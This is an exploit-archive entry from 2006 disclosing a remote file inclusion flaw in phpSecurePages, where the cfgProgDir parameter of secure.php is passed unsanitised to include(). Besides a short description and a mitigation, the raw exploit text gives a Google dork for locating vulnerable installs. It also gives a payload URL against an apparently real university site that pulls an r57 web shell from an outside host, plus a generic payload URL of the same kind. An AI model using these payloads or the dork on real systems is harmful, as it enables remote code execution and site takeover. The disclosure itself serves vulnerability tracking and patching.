phpsecurepages (cfgProgDir) Remote File Include Vulnerability

vendor:

phpSecurePages

by:

D_7J

N/A

CVSS

N/A

Remote File Include

CWE

Product Name: phpSecurePages

Affected Version From: all versions

Affected Version To: all versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpsecurepages (cfgProgDir) Remote File Include Vulnerability

A vulnerability exists in phpSecurePages, which is caused due to the use of user-supplied input in the 'cfgProgDir' parameter of the 'secure.php' script without proper sanitization. This can be exploited to include arbitrary files from remote locations by passing a URL in the 'cfgProgDir' parameter. Successful exploitation requires that 'allow_url_include' is set to 'On' in the php.ini configuration file.

Mitigation:

Disable 'allow_url_include' in the php.ini configuration file.

Source

Exploit-DB raw data:

#==============================================================================================
#phpsecurepages (cfgProgDir) Remote File Include Vulnerability
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Download from : http://www.comscripts.com/jump.php?action=script&id=1491
#                                                                      
#Version : all versions                                            
#                                                        
#================================================================================================
#
#Google Dork : inurl:"phpsecurepages"
#
#================================================================================================
#Bug in : /phpSecurePages/secure.php
#
#Vlu Code :
#--------------------------------
#
# 	include($cfgProgDir . "lng/" . $languageFile);
#	include($cfgProgDir . "session.php");
#
#	example:http://www.teilar.gr/services/noc/admin/phpSecurePages/secure.php?cfgProgDir=http://d4wood.by.ru/r57shell.php?
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/secure.php?cfgProgDir==http://sheller.com?
#
#================================================================================================
#Discoverd By : D_7J
#
#Site:http://Deltahacking.ir (public) http://deltahacking.net (priv8)
#
#Conatact : D_7J[at]yahoo[dot]com & D_7J[at]Deltahacking[dot]net
#
#Special Thx To : Str0ke
#
#Greetz: All Iranian Hackers
# ==================================================================================================

# milw0rm.com [2006-09-28]